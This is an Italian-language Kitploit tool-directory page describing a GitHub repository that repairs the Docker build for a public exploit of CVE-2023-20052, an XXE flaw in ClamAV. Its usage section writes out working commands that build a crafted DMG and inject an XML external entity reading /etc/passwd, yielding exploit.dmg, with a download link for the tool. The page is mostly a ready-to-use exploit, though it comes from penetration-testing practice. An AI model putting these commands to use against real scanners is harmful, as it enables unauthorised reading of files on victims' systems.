Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-20052 | Kitploit
Strumenti/GitHubGitHub/mohitsinghpapola/cve-2023-20052
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingAnalisi MalwareAnalisi di Binari
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit CVE-2023-20052 - Build Corretta

Build Docker corretta per CVE-2023-20052 (vulnerabilità XXE di ClamAV) che compila davvero.

Cosa era rotto

L'exploit originale non riesce a compilare sui sistemi moderni:

  • ❌ Errori di compatibilità con OpenSSL 3.0
  • ❌ Errori di tipo incompleto della struct HMAC_CTX
  • ❌ Errori di dichiarazione implicita di funzione
  • ❌ La build fallisce alla compilazione di dmg/filevault.c

Cosa ho corretto

  1. Modificata l'immagine di base: Ubuntu 22.04 → Ubuntu 18.04
  2. Corretta la versione di OpenSSL: Usa libssl1.0-dev (OpenSSL 1.0)
  3. Aggiunta la modalità non interattiva: Evita i prompt di build
  4. Dockerfile funzionante: Compila davvero con successo

Perché funziona

libdmg-hfsplus utilizza funzioni deprecate di OpenSSL 1.0:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (rimosse in OpenSSL 1.1+)
  • Uso diretto della struct HMAC_CTX (opaca in OpenSSL 1.1+)

Ubuntu 18.04 è l'ultima LTS con supporto per OpenSSL 1.0.

Build e Utilizzo

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Crediti

  • Exploit originale: nokn0wthing/CVE-2023-20052
  • Corretto da: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
Scarica lo strumento